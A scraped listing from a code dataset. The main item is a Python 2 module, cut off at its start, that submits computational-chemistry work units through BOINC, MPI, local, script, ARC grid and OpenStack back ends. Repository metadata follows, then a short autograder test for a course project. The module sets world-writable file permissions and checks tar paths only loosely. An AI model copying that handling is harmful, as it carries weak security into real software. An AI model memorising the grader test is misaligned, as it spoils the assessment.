# is not helpful. It often will just say that it couldn't parse a xml file when it
# really means it can't find the project's config.xml file.
import traceback
# print the traceback from connect_default_config
traceback.print_exc()
# raise a nice human readable error
raise CommunicatorError("Couldn't connect to the BOINC database.")
self.dbconnection = self.db_base.dbconnection
self.cursor = self.dbconnection.cursor()
# generate our unique id if it doesn't already exist.
uniqueid_path = os.path.join(self.scratchpath, "uniqueid")
if not os.path.isfile(uniqueid_path):
f = open(uniqueid_path, 'w')
import random
uid = random.randint(0, 2147483647)
f.write("%s\n" % uid)
f.close()
logger.debug("Wrote new unique id %i to %s" % (uid, uniqueid_path))
try:
f = open(uniqueid_path)
except IOError:
raise CommunicatorError("Unable to open the uniqueid file: %s" % uniqueid_path)
try:
self.uniqueid = int(f.read().strip())
logger.debug("Read in unique id %i from %s" % (self.uniqueid,
uniqueid_path))
except ValueError:
raise CommunicatorError("Trouble converting uniqueid value in %s to integer" % uniqueid_path)
self.average_flops = self.get_average_flops()
logger.debug("Current average flops per wu is %.2e", self.average_flops)
def get_average_flops(self):
'This function might be slow with large result tables and without '
'mysql indices on result.cpu_time, result.workunits, result.hostid, '
'and workunit.batch.'
# number of wus to average over
limit = 500
query = "select r.cpu_time*h.p_fpops " \
"from workunit w, result r, host h "\
"where r.workunitid=w.id and r.hostid=h.id and w.batch=%i "\
"and cpu_time>0 limit %i" % (self.uniqueid, limit)
self.cursor.execute(query)
rows = self.cursor.fetchall()
if rows:
average_flops = 0.0
counter = 0
for row in rows:
average_flops += row.values()[0]
counter += 1
average_flops /= counter
else:
# 2e11 flops is about a 100 second job (assuming 2 gigaflop cpu)
average_flops = 2e11
return average_flops
def get_queue_size(self):
server_state = self.boinc_db_constants.RESULT_SERVER_STATE_UNSENT
query = 'select count(*) from result where batch=%i and server_state=%i'
query = query % (self.uniqueid, server_state)
self.cursor.execute(query)
row = self.cursor.fetchone()
number_unsent = row['count(*)']
return number_unsent
def get_number_in_progress(self):
server_state = self.boinc_db_constants.RESULT_SERVER_STATE_IN_PROGRESS
query = 'select count(*) from result where batch=%i and server_state=%i'
query = query % (self.uniqueid, server_state)
self.cursor.execute(query)
row = self.cursor.fetchone()
number_in_progress = row['count(*)']
return number_in_progress
def cancel_state(self, statenumber):
# XXX: This function might be too expensive. Probably needs to be
# profiled later. It has to get all of the result rows that correspond
# to a unique id find which state they correspond to by parsing the
# wu name and then update the rows that correspond to statenumber.
state_unsent = self.boinc_db_constants.RESULT_SERVER_STATE_UNSENT
q1 = "select id,workunitid,name from result where batch=%i and server_state=%i"
q1 = q1 % (self.uniqueid, state_unsent)
self.cursor.execute(q1)
if self.cursor.rowcount == 0:
return 0
result_ids = []
workunit_ids = []
while 1:
row = self.cursor.fetchone()
if row is None:
break
result_id = row['id']
workunit_id = row['workunitid']
name = row['name']
result_statenumber = name.split('_')[1]
if statenumber == int(result_statenumber):
result_ids.append(str(result_id))
workunit_ids.append(str(workunit_id))
resultid_string = '('+','.join(result_ids) + ')'
state_over = self.boinc_db_constants.RESULT_SERVER_STATE_OVER
outcome_not_needed = self.boinc_db_constants.RESULT_OUTCOME_DIDNT_NEED
error_mask_cancelled = self.boinc_db_constants.WU_ERROR_CANCELLED
q1 = "update result set server_state=%i, outcome=%i where id in %s"
q1 = q1 % (state_over, outcome_not_needed, resultid_string)
self.cursor.execute(q1)
workunitid_string = '('+','.join(workunit_ids) + ')'
q2 = "update workunit set error_mask=%i, transition_time=%i where id in %s"
q2 = q2 % (error_mask_cancelled, int(time()), workunitid_string)
self.cursor.execute(q2)
num_cancelled_wu = self.cursor.rowcount
self.db_base.dbconnection.commit()
return num_cancelled_wu
def dir_hier_path(self, filename):
cmd = os.path.join(self.boinc_project_dir,"bin","dir_hier_path")
path = commands.getoutput("%s %s" % (cmd, filename))
return path
def submit_jobs(self, jobdata, invariants):
now = time()
chunks = [ jobdata[i:i+self.bundle_size] for i in
range(0, len(jobdata), self.bundle_size) ]
for jobs in chunks:
wu_name = "%i_%s" % (self.uniqueid, jobs[0]['id'])
tarname = "%s.tgz" % wu_name
tarpath = self.dir_hier_path(tarname)
tar = tarfile.open(tarpath, "w:gz")
jobfiles = {}
n=0
for job in jobs:
job.pop('id')
for origname,data in job.iteritems():
splitname = origname.rsplit(".",1)
newname = "%s_%d.%s" % (splitname[0], n, splitname[1])
jobfiles[newname] = data
n += 1
# Add the files in job and in invariants to the tar file
for filelist in (jobfiles, invariants):
for filename, filehandle in filelist.iteritems():
info = tarfile.TarInfo(name=filename)
info.size = len(filehandle.getvalue())
info.mtime = now
filehandle.seek(0)
tar.addfile(info, filehandle);
tar.close()
self.create_work(tarpath, wu_name)
def create_work(self, tarpath, wu_name):
create_wu_cmd = os.path.join('bin', 'create_work')
# XXX: make sure permissions are correct
# this should be a config option for the boinc group
mode = 0666
os.chmod(tarpath, mode)
arglist = [create_wu_cmd]
arglist.append("-appname")
arglist.append(self.appname)
arglist.append("-wu_name")
arglist.append(wu_name)
arglist.append("-wu_template")
arglist.append(self.wu_template)
arglist.append("-result_template")
arglist.append(self.result_template)
arglist.append("-batch")
arglist.append(str(self.uniqueid))
arglist.append("-priority")
arglist.append(str(self.priority))
arglist.append("-rsc_fpops_est")
arglist.append(str(self.average_flops))
# last arguments are the filenames
arglist.append("%s.tgz" % wu_name)
p = subprocess.Popen(arglist, cwd=self.boinc_project_dir,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
retval = p.wait()
if retval != 0:
stdout, stderr = p.communicate()
errstr = "Problem submitting the BOINC workunit:\nstdout: %s\nstderr %s" % \
(stdout, stderr)
raise CommunicatorError(errstr)
def get_results(self, resultspath, keep_result):
all_results = os.listdir(self.boinc_results_path)
all_results = [ f for f in all_results if '_' in f ]
my_results = [ f for f in all_results
if f.split('_')[0] == str(self.uniqueid) and
'no_output_files' not in f]
for resultfile in my_results:
# jobname looks like state#_job#
# jobname is everything but the first underscore records
jobname = '_'.join(resultfile.split('_')[1:])
resultpath = os.path.join(self.boinc_results_path, resultfile)
if not keep_result(jobname):
os.remove(resultpath)
continue
try:
tar = tarfile.open(resultpath)
bundle_size, _ = self.get_bundle_size(tar.getnames())
results = [ {'name':jobname} for i in range(bundle_size) ]
if config.debug_keep_all_results:
rp = os.path.join(config.path_root,config.debug_results_path)
if not os.path.isdir(rp):
os.mkdir(rp)
os.mkdir(os.path.join(rp,jobname))
for tarinfo in tar:
try:
index = int(tarinfo.name.split('_')[-1].split('.')[0])
except:
logger.exception("Failed to process file %s in tar" % tarinfo.name)
continue
splitname = tarinfo.name.rsplit(".",1)
newfilename = "%s.%s" % (splitname[0].rsplit("_",1)[0],splitname[1])
# Read the file in the tar archive into a stringio; you cannot return the filehandle
# that extractfile returns as it will be closed when tar.close() is called.
fh = StringIO(tar.extractfile(tarinfo).read())
if config.debug_keep_all_results:
f = open(os.path.join(config.path_root, config.debug_results_path, jobname, tarinfo.name),'w')
f.write(fh.getvalue())
f.close()
fh.seek(0)
results[index][newfilename] = fh
results[index]["number"] = index
tar.close()
# os.remove(resultpath)
except:
logger.exception(
"Something tar-file related went wrong with file %s" % resultpath)
try:
os.remove(resultpath)
except:
logger.exception("Failed to remove %s" % resultpath)
continue
for result in results:
yield result
class MPI(Communicator):
def __init__(self, scratchpath, bundle_size):
Communicator.__init__(self, scratchpath, bundle_size)
from mpi4py.MPI import COMM_WORLD
self.comm = COMM_WORLD
self.client_ranks = [ int(r) for r in os.environ['EON_CLIENT_RANKS'].split(":") ]
config.comm_job_buffer_size = len(self.client_ranks)
self.resume_jobs = []
if os.path.isdir(self.scratchpath):
self.resume_jobs = [ d for d in os.listdir(self.scratchpath) if os.path.isdir(os.path.join(self.scratchpath,d)) ]
logger.info("Found %i jobs to resume in %s", len(self.resume_jobs), self.scratchpath)
def submit_jobs(self, data, invariants):
ready_ranks = self.get_ready_ranks()
for jobpath in self.make_bundles(data, invariants):
rank = ready_ranks.pop()
tmp = numpy.empty(1, dtype='i')
self.comm.Recv(tmp, source=rank, tag=1)
buf = array('c', jobpath+'\0')
self.comm.Send(buf, rank)
def run_resume_jobs(self):
if len(self.resume_jobs) == 0: return
ready_ranks = self.get_ready_ranks()
while True:
if len(self.resume_jobs) == 0: break
if len(ready_ranks) == 0: break
jobdir = self.resume_jobs.pop()
rank = ready_ranks.pop()
jobpath = os.path.join(self.scratchpath,jobdir)
tmp = numpy.empty(1, dtype='i')
self.comm.Recv(tmp, source=rank, tag=1)
buf = array('c', jobpath+'\0')
self.comm.Send(buf, rank)
def get_ready_ranks(self):
ready_ranks = []
for rank in self.client_ranks:
ready = self.comm.Iprobe(rank, tag=1)
if ready:
logger.info("Rank %i is ready" % rank)
ready_ranks.append(rank)
return ready_ranks
def get_queue_size(self):
self.run_resume_jobs()
nready = len(self.get_ready_ranks())
nclients = len(self.client_ranks)
qs = nclients - nready
return qs
def get_results(self, resultspath, keep_result):
'''Moves work from scratchpath to results path.'''
from mpi4py.MPI import ANY_SOURCE, Status
status = Status()
while self.comm.Iprobe(ANY_SOURCE, tag=0, status=status):
buf = array('c', '\0'*1024)
self.comm.Recv(buf, source=status.source, tag=0)
jobdir = buf[:buf.index('\0')].tostring()
jobdir = os.path.split(jobdir)[1]
if config.debug_keep_all_results:
shutil.copytree(os.path.join(self.scratchpath,jobdir),
os.path.join(config.path_root, config.debug_results_path, jobdir))
dest_dir = os.path.join(resultspath, jobdir)
shutil.move(os.path.join(self.scratchpath,jobdir), dest_dir)
for bundle in self.unbundle(resultspath, keep_result):
for result in bundle:
yield result
def get_number_in_progress(self):
return int(os.environ['EON_NUMBER_OF_CLIENTS'])
def cancel_state(self, state):
#XXX: how to support this...
return 0
class Local(Communicator):
def __init__(self, scratchpath, client, ncpus, bundle_size):
Communicator.__init__(self, scratchpath, bundle_size)
# number of cpus to use
self.ncpus = ncpus
# path to the client
if '/' in client:
self.client = os.path.abspath(client)
if not os.path.isfile(self.client):
logger.error("Can't find client: %s", client)
raise CommunicatorError("Can't find client binary: %s"%client)
else:
# is the client in the local directory?
if os.path.isfile(client):
self.client = os.path.abspath(client)
# is the client in the path?
elif sum([ os.path.isfile(os.path.join(d, client)) for d in
os.environ['PATH'].split(':') ]) != 0:
self.client = client
else:
logger.error("Can't find client: %s", client)
raise CommunicatorError("Can't find client binary: %s"%client)
self.joblist = []
import atexit
# don't let clients hang around if the script dies
atexit.register(self.cleanup)
def cleanup(self):
'''Kills the running eonclients.'''
import signal
for job in self.joblist:
p = job[0]
try:
os.kill(p.pid, signal.SIGKILL)
except OSError:
pass
def get_results(self, resultspath, keep_result):
'''Moves work from scratchpath to results path.'''
jobdirs = [ d for d in os.listdir(self.scratchpath)
if os.path.isdir(os.path.join(self.scratchpath,d)) ]
for jobdir in jobdirs:
if config.debug_keep_all_results:
shutil.copytree(os.path.join(self.scratchpath,jobdir), os.path.join(config.path_root, config.debug_results_path,jobdir))
dest_dir = os.path.join(resultspath, jobdir)
shutil.move(os.path.join(self.scratchpath,jobdir), dest_dir)
for bundle in self.unbundle(resultspath, keep_result):
for result in bundle:
yield result
# Clean out scratch directory
for name in os.listdir(self.scratchpath):
path_name = os.path.join(self.scratchpath, name)
if not os.path.isdir(path_name):
continue
shutil.rmtree(path_name)
def check_job(self, job):
p, jobpath = job
if p.returncode == 0:
logger.info('Job finished: %s' % jobpath)
return True
else:
stdout, stderr = p.communicate()
errmsg = "job failed: %s: %s" % (jobpath, stderr)
logger.warning(errmsg)
def submit_jobs(self, data, invariants):
'''Run up to ncpu number of clients to process the work in jobpaths.
The job directories are moved to the scratch path before the calculation
is run. This method doesn't return anything.'''
for jobpath in self.make_bundles(data, invariants):
# move the job directory to the scratch directory
# update jobpath to be in the scratch directory
fstdout = open(os.path.join(jobpath, "stdout.dat"),'w')
p = subprocess.Popen(self.client,cwd=jobpath,
stdout=fstdout, stderr=subprocess.PIPE)
#commands.getoutput("renice -n 20 -p %d" % p.pid)
self.joblist.append((p,jobpath))
while len(self.joblist) == self.ncpus:
for i in range(len(self.joblist)):
p = self.joblist[i][0]
retval = p.poll()
if retval is None:
continue
else:
self.check_job(self.joblist[i])
self.joblist.pop(i)
break
sleep(0.1)
# wait for everything to finish
for job in self.joblist:
p = job[0]
p.wait()
self.check_job(job)
def cancel_state(self, state):
return 0
def get_queue_size(self):
return 0
def get_number_in_progress(self):
return 0
class Script(Communicator):
def __init__(self, scratch_path, bundle_size, name_prefix, scripts_path,
queued_jobs_cmd, cancel_job_cmd, submit_job_cmd):
Communicator.__init__(self, scratch_path, bundle_size)
self.queued_jobs_cmd = os.path.join(scripts_path, queued_jobs_cmd)
self.cancel_job_cmd = os.path.join(scripts_path, cancel_job_cmd)
self.submit_job_cmd = os.path.join(scripts_path, submit_job_cmd)
self.job_id_path = os.path.join(scratch_path, "script_job_ids")
self.name_prefix = name_prefix
# read in job ids
try:
f = open(self.job_id_path, "r")
self.jobids = pickle.load(f)
f.close()
except IOError:
self.jobids = {}
pass
def save_jobids(self):
f = open(self.job_id_path, "w")
pickle.dump(self.jobids, f)
f.close()
def get_results(self, resultspath, keep_result):
'''Moves work from scratchpath to results path.'''
# queued_jobs.sh jobid1 jobid2 jobid 3
# the inverse of the jobids returned is
# job dirs needs to map
queued_jobs = self.get_queued_jobs()
finished_jobids = set(self.jobids.keys()) - set(self.get_queued_jobs())
finished_eonids = []
for jobid in finished_jobids:
finished_eonids.append(int(self.jobids.pop(jobid)))
jobdirs = [ d for d in os.listdir(self.scratchpath)
if os.path.isdir(os.path.join(self.scratchpath,d))
if int(d.rsplit('_', 1)[-1]) in finished_eonids ]
#try to return jobs in order
sort_nicely(jobdirs)
for jobdir in jobdirs:
if config.debug_keep_all_results:
shutil.copytree(os.path.join(self.scratchpath,jobdir), os.path.join(config.path_root, config.debug_results_path,jobdir))
dest_dir = os.path.join(resultspath, jobdir)
shutil.move(os.path.join(self.scratchpath,jobdir), dest_dir)
for bundle in self.unbundle(resultspath, keep_result):
for result in bundle:
yield result
def check_command(self, status, output, cmdname):
if status != 0:
logger.error(output)
raise CommunicatorError("'%s' returned a non-zero exit status"%cmdname)
def submit_jobs(self, data, invariants):
for jobpath in self.make_bundles(data, invariants):
# submit_job.sh jobname jobpath
# should return a jobid
# need to associate this jobid with our jobid
jobpath = os.path.realpath(jobpath)
jobname = "%s_%s" % (self.name_prefix, os.path.basename(jobpath))
eon_jobid = jobname.rsplit('_',1)[-1]
cmd = "%s %s %s" % (self.submit_job_cmd, jobname, jobpath)
status, output = commands.getstatusoutput(cmd)
self.check_command(status, output,cmd)
jobid = int(output.strip())
self.jobids[jobid] = eon_jobid
# XXX: It is probably slow to save after EVERY job submission,
# but is slow better than losing jobs?
self.save_jobids()
def cancel_state(self, state):
# cancel_job.sh jobid
if len(self.jobids.keys()) == 0:
return 0
for job_id in self.jobids.keys():
cmd = "%s %i" % (self.cancel_job_cmd, job_id)
status, output = commands.getstatusoutput(cmd)
if status != 0:
logger.warn("Job cancel failed with error: %s" % output)
self.jobids = {}
self.save_jobids()
shutil.rmtree(config.path_scratch)
os.makedirs(config.path_scratch)
return len(self.jobids.keys())
def get_queued_jobs(self):
# get_queued_jobs.sh
# should return the jobids of the jobs in the queue
status, output = commands.getstatusoutput(self.queued_jobs_cmd)
self.check_command(status, output, self.queued_jobs_cmd)
queued_job_ids = []
for line in output.split("\n"):
try:
queued_job_ids.append(int(line))
except ValueError:
continue
return list(set(self.jobids).intersection(queued_job_ids))
def get_number_in_progress(self):
return 0
def get_queue_size(self):
return len(self.get_queued_jobs())
class ARC(Communicator):
def __init__(self, scratchpath, bundle_size, client_path, blacklist, num_submit):
self.init_completed = False
Communicator.__init__(self, scratchpath, bundle_size)
try:
import arclib
self.arclib = arclib
except ImportError:
raise CommunicatorError("ARCLib can't be imported. Check if PYTHONPATH is set correctly")
self.arclib.SetNotifyLevel(self.arclib.WARNING)
self.client_path = client_path
self.num_submit = num_submit
self.blacklist = blacklist
self.queue_info = None
# Check grid certificate proxy
try:
c = self.arclib.Certificate(self.arclib.PROXY)
except self.arclib.CertificateError, msg:
raise CommunicatorError(str(msg) + ".\n\nForgot to run grid-proxy-init?\n")
if c.IsExpired():
raise CommunicatorError("Grid proxy has expired!")
logger.info("Grid proxy is valid for " + c.ValidFor())
# Get a list of jobs, and find their statuses.
self.busy_clusters = []
self.active_jobs = []
self.active_jobsfilename = os.path.join(self.scratchpath, "active_jobs.txt")
if os.path.isfile(self.active_jobsfilename):
jobids = {}
f = open(self.active_jobsfilename, "r")
for line in f:
(jid, jname) = line.split('#')
jobids[jid] = jname[:-1] # (Remove trailing '\n' from name).
else:
jobids = {}
if jobids:
for info in self.arclib.GetJobInfo(jobids.keys()):
job = {"id": info.id, "name": jobids[info.id]}
if info.status in [ "FINISHED", "FAILED" ]:
job["stage"] = "Done"
job["success"] = (info.status == "FINISHED")
elif info.status in [ "DELETED", "KILLED", "KILLING" ]:
job["stage"] = "Aborted" # Supposed to disappear by itself soonish
elif info.status in [ "ACCEPTING", "ACCEPTED", "PREPARING", "PREPARED", "SUBMITTING", "INLRMS:Q" ]:
job["stage"] = "Queueing"
if info.cluster not in self.busy_clusters:
self.busy_clusters.append(info.cluster)
elif info.status == "":
# XXX: The most common reason for info.status == "" is that
# the job was submitted so recently that ARC info.sys.
# hasn't picked up the job yet, which is why I decided
# to consider it to be "Queueing". But it could also be the
# ARC info.sys being down, or other problems.
job["stage"] = "Queueing"
if info.cluster not in self.busy_clusters:
self.busy_clusters.append(info.cluster)
else:
job["stage"] = "Running"
if job["stage"] != "Aborted":
self.active_jobs.append(job)
#logger.info("Job %s / %s found in state %s (%s)" % (job["name"], job["id"], job["stage"], info.status))
# loads the server job-queue
self.job_queue_filename = os.path.join(self.scratchpath, "job_queue.pickle")
if os.path.isfile(self.job_queue_filename):
f = open(self.job_queue_filename, "r")
self.job_queue = pickle.load(f)
f.close()
else:
self.job_queue = []
self.init_completed = True
def __del__(self):
"""
Remember jobs for future invocations.
"""
logger.debug("ARC.__del__ invoked!")
if self.init_completed:
# Save the jobs to two files for the future, but only if
# __init__() was successful - if it wasn't we might not have
# read all the jobs from previous runs, in which case
# information on those jobs would be overwritten.
# (And no jobs could have been submitted or retrieved;
# init_completed = False means we crashed at an early stage, so
# there's nothing new to save)
f = open(self.active_jobsfilename, "w")
for j in self.active_jobs:
if j["stage"] not in ["Aborted", "Retrieved"]:
f.write(j["id"] + '#' + j["name"] + '\n')
f.close()
f = open(self.job_queue_filename, "w")
pickle.dump(self.job_queue, f)
f.close()
def create_wrapper_script(self):
'''Create a wrapper script to execute a job. Return path to script.'''
s = """
#!/bin/bash
set -e # Immediately exit if any command fail
ls -l
if [ -f client-bin ]; then
# It seems we got a EON client binary as an inputfile. It does
# (probably) not have execute bit set, and it might be a
# sym-link to a file we don't own, so we have to make a copy
# and change permissions of the copy instead.
export PATH=$PATH:$PWD
cp client-bin client
chmod +x client
fi
ls -l
tar jxvf $1.tar.bz2
cd $1
client
cd $HOME
tar jcvf $1.tar.bz2 $1
echo $1
"""
script_path = os.path.join(self.scratchpath, 'wrapper.sh')
try:
f = open(script_path, "w")
f.write(s)
f.close()
except Exception, msg:
raise CommunicatorError("Can't create wrapper script: %s" % msg)
return script_path
def create_tarball(self, src, dest):
"""Pack directory 'src' into tar.bz2 file 'dest', makeing sure it will unpack into
a dir called basename(src), rather than path/to/src"""
# Remove trailing '/'; it would cause trouble with
# os.path.dirname() and os.path.basename()
if src[-1] == '/':
src = src[:-1]
# Since we'll change directory for a while, we should make sure we
# use absolute paths, rather than relative ones:
src = os.path.abspath(src)
dest = os.path.abspath(dest)
dirname = os.path.dirname(src)
basename = os.path.basename(src)
cwd = os.getcwd()
try:
os.chdir(dirname)
tarball = tarfile.open(dest, 'w:bz2')
tarball.add(basename)
tarball.close()
finally:
os.chdir(cwd)
def open_tarball(self, filename, dest_dir):
"""Pack upp tar.bz2 file beneth the directory dest_dir."""
try:
tarball = tarfile.open(filename, 'r:bz2')
# For security reasons, filter out filenames that might end up
# outside of 'dest_dir':
files = tarball.getmembers()
good_files = [ f for f in files if f.name[0:2] != '..' and f.name[0] != '/' ]
for f in good_files:
tarball.extract(path=dest_dir, member=f)
tarball.close()
except IOError:
logger.warning("Could not open tarball %s" % (filename))
def create_job(self, job_path, wrapper_path):
'''Prepare a job who's inputfiles are found in 'job_path'.
Return a string to be used as input for xsrl and job name.'''
# Remove trailing '/'; it would cause trouble with os.path.basename()
if job_path[-1] == '/':
job_path = job_path[:-1]
basename = os.path.basename(job_path)
tarball_path = os.path.join(self.scratchpath, basename + ".tar.bz2")
self.create_tarball(job_path, tarball_path)
shutil.rmtree(job_path)
s = "&"
s += "(executable=%s)" % os.path.basename(wrapper_path)
s += "(arguments=%s)" % basename
s += "(inputFiles="
if self.client_path:
s += "(%s %s)" % ("client-bin", self.client_path)
s += "(%s %s)" % (os.path.basename(wrapper_path), wrapper_path)
s += "(%s %s)" % (os.path.basename(tarball_path), tarball_path)
s += ")"
s += "(outputFiles="
s += "(%s '')" % os.path.basename(tarball_path)
s += ")"
if config.debug_keep_all_results:
s += "(stdout=stdout)"
s += "(stderr=stderr)"
s += "(gmlog=gmlog)"
if not self.client_path:
s += "(runTimeEnvironment=APPS/CHEM/EON2)"
jobname = "%s" % basename
s += "(jobName=%s)" % jobname
# requirements to the host
# 500 MB memory
s += '(Memory="500")'
# 120 minutes
s += '(wallTime="120")'
logger.debug("job_string: " + s)
return s, jobname, tarball_path
def submit_job_to_target(self, hostname):
if(len(self.job_queue)):
job_string, job_name, job_tarball = self.job_queue.pop(0)
xrsl = self.arclib.Xrsl(job_string)
# fetch the target which hostname passed was
target = None
all_targets = self.arclib.ConstructTargets(self.queue_info, xrsl)
for t in all_targets:
if t.cluster.hostname == hostname:
target = self.arclib.PerformStandardBrokering([t])
break
if target:
try:
job_id = self.arclib.SubmitJob(xrsl, target)
os.remove(job_tarball)
except self.arclib.JobSubmissionError, msg:
raise CommunicatorError(msg)
except self.arclib.XrslError, msg:
raise CommunicatorError(msg)
self.arclib.AddJobID(job_id, job_name)
self.active_jobs.append({"id": job_id, "name": job_name, "stage":"Queueing"})
logger.info("Submitted " + job_id)
else:
logger.info("Failed to submit to " + hostname)
def get_targets_hostnames(self, xrsl):
"""Get list of hostnames of clusters+queues we can submit to."""
hostnames = []
targets = self.get_targets(xrsl)
for t in targets:
hostnames.append(t.cluster.hostname)
return hostnames
def get_targets(self, xrsl):
"""Get list of clusters+queues we can submit to."""
if not self.queue_info:
self.queue_info = self.arclib.GetQueueInfo()
targets_initial = self.arclib.ConstructTargets(self.queue_info, xrsl)
logger.debug("List of targets: " + ', '.join([ t.cluster.hostname for t in targets_initial ]))
if self.blacklist:
targets_not_bl = []
for t in targets_initial:
if t.cluster.hostname not in self.blacklist:
targets_not_bl.append(t)
logger.debug("List of targets after blacklisting: " + ', '.join([ t.cluster.hostname for t in targets_not_bl ]))
else:
targets_not_bl = targets_initial
if self.busy_clusters:
targets = []
for t in targets_not_bl:
if t.cluster.hostname not in self.busy_clusters:
targets.append(t)
logger.debug("List of targets after queing check: " + ', '.join([ t.cluster.hostname for t in targets ]))
else:
targets = targets_not_bl
return self.arclib.PerformStandardBrokering(targets)
def submit_jobs(self, data, invariants):
'''Throws CommunicatorError if fails.'''
# add new jobs to queue
wrapper_path = self.create_wrapper_script()
for job_path in self.make_bundles(data, invariants):
job_string, job_name, job_tarball = self.create_job(job_path, wrapper_path)
self.job_queue.append([job_string, job_name, job_tarball])
# are there jobs to submit
if len(self.job_queue):
# uses first element in queue to get list of free resources
xrsl = self.arclib.Xrsl(self.job_queue[0][0])
targets_hostnames = self.get_targets_hostnames(xrsl)
else:
targets_hostnames = []
for target_hostname in targets_hostnames:
submitted_to_target = 0
while (submitted_to_target < self.num_submit):
self.submit_job_to_target(target_hostname)
submitted_to_target = submitted_to_target + 1
def get_job_output(self, jobid, resultspath):
"""Fetch the output files of a job.
The files are put in a subdirectory of resultspath,
and the full path of the subdirectory is returned."""
n = jobid.split('/')[-1]
outputdir = os.path.join(resultspath, n)
if not os.path.isdir(outputdir):
os.makedirs(outputdir)
ftp = self.arclib.FTPControl()
ftp.DownloadDirectory(jobid, outputdir)
return outputdir
def get_results(self, resultspath, keep_result):
'''Returns a list of directories containing the results.'''
result_dirs = []
done = [ j for j in self.active_jobs if j["stage"] == "Done" ]
for job in done:
jid = job["id"]
jname = job["name"]
p = self.get_job_output(jid, self.scratchpath)
tarball = os.path.join(p, "%s.tar.bz2" % jname)
if job["success"]:
self.open_tarball(tarball, resultspath)
logger.info("Fetched %s / %s" % (jname, jid))
else:
logger.warning("Job %s / %s FAILED.\nOutput files can be found in %s" % (jname, jid, p))
job["stage"] = "Retrieved"
self.arclib.RemoveJobID(jid) # Remove from ~/.ngjobs
self.arclib.CleanJob(jid) # Remove from ARC sever
if not config.debug_keep_all_results:
os.remove(tarball) # keep server scratch dir clean
shutil.rmtree(p)
for bundle in self.unbundle(resultspath, keep_result):
for result in bundle:
yield result
def get_queue_size(self):
'''Returns the number of items waiting to run in the server queue.'''
return len(self.job_queue)
def cancel_job(self, job):
'''Removed job from cluster queue'''
try:
self.arclib.CleanJob(job["id"])
except:
logger.warning('Did not clean up the cancelled job!')
return
# we are sure that the job is removed from the cluster
# remove id from the local list
self.arclib.RemoveJobID(job["id"])
job["stage"] = "Aborted"
return
def cancel_state(self, statenumber):
'''Returns the number of workunits that were canceled.'''
logger.debug("cancel_state called with statenumber = %i (%s)" % (int(statenumber), type(statenumber)))
n = 0
for j in self.active_jobs:
sn = j["name"].split('_')[0]
# if int(sn) == int(statenumber) and j["stage"] not in [ "Aborted", "Retrieved" ]:
if int(sn) <= int(statenumber) and j["stage"] not in [ "Aborted", "Retrieved" ]:
self.cancel_job(j)
logger.debug("Canceling job %s / %s" % (j["name"], j["id"]))
n += 1
self.job_queue = []
return n
class OSP(Communicator):
def __init__(self, scratchpath, bundle_size, rc_files, n_workers = None, master_index = 0, eon_server = None):
#print scratchpath,bundle_size,rc_files,n_workers
Communicator.__init__(self, scratchpath, bundle_size)
if eon_server == "web":
self.ip = '127.0.0.1'
elif eon_server == "local" and os.path.isfile(os.path.join(scratchpath,'.running')):
f = open(os.path.join(scratchpath,'.running'),'r')
self.metadata = pickle.load(f)
else:
self.metadata = openstackeon.run(rc_files,n_workers,scratchpath,master_index)
self.ip = self.metadata['master_ip']
self.scratchpath = scratchpath
jobs_path = os.path.join(self.scratchpath,'.jobs')
if os.path.isfile(jobs_path):
jobs = open(jobs_path,'r')
self.jobs = pickle.load(jobs)
else:
self.jobs = []
def get_results(self, resultspath,keep_result):
'''Moves work from queue to results path.'''
##TODO Add timeout
results = [job.get() for job in self.jobs if job.ready() == True]
for (path,b64) in results:
path = os.path.join(resultspath,path)
if not os.path.exists(path):
os.mkdir(path)
f = open(os.path.join(path,'out.dat'),'w')
f.write(base64.b64decode(b64))
f.close()
for bundle in self.unbundle(resultspath, keep_result):
for result in bundle:
yield result
def submit_path(self,jobpath):
jobdir = os.path.split(jobpath)[1]
logger.info("OSP: Queing %s" %(jobpath))
message = openstackeon.tar64(jobpath)
return eon_work.delay(message,jobdir)
def submit_jobs(self, jobpaths,invariants):
'''Run up to clients to process the work in jobpaths.
The job directories are moved to the scratch path before the calculcation
is run. This method doesn't return anything.'''
##TODO ADD timeout.
bundles = self.make_bundles(jobpaths,invariants)
self.jobs = [self.submit_path(jobpath) for jobpath in bundles]
#while all([job.ready() for job in self.jobs]) is not True:
# print [job.ready() for job in self.jobs]
# sleep(0.1)
jobs_path = os.path.join(self.scratchpath,'.jobs')
jobs = open(jobs_path,'w')
pickle.dump(self.jobs,jobs)
def get_queue_size(self):
##TODO Get queue size from Celery
print "get_queue_size", self.ip
return len(self.jobs)
def cleanup(self):
'''Kill running OS instances'''
##TODO Fix cleanup
for instance in self.instances:
instance.terminate()
|
[
"MaxN90@gmail.com"
] |
MaxN90@gmail.com
|
3269d977f4f6d44a4f58c7130663ff644a951a93
|
f5ced23208510d76b5df1571b44e344086ca8bef
|
/Projects/Project01/tests/q1_7.py
|
e793ac32bd0c661bd63bc54247df4469c15478ca
|
[] |
no_license
|
jemmott/DSC10-Sp20
|
1c358638cbbe086cc1710c66dd299889d754b4ac
|
a1c30d7dc318471f1ce17cd613ffc278fe00f1db
|
refs/heads/master
| 2021-05-16T18:44:47.022718
| 2020-06-09T19:52:11
| 2020-06-09T19:52:11
| 250,424,744
| 4
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 421
|
py
|
test = {
'name': 'q1_7',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> # should be a dataframe
>>> isinstance(class_counts, bpd.DataFrame)
True
>>> len(class_counts.columns) == 1
True
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
|
[
"51950358+jeffrey7377@users.noreply.github.com"
] |
51950358+jeffrey7377@users.noreply.github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.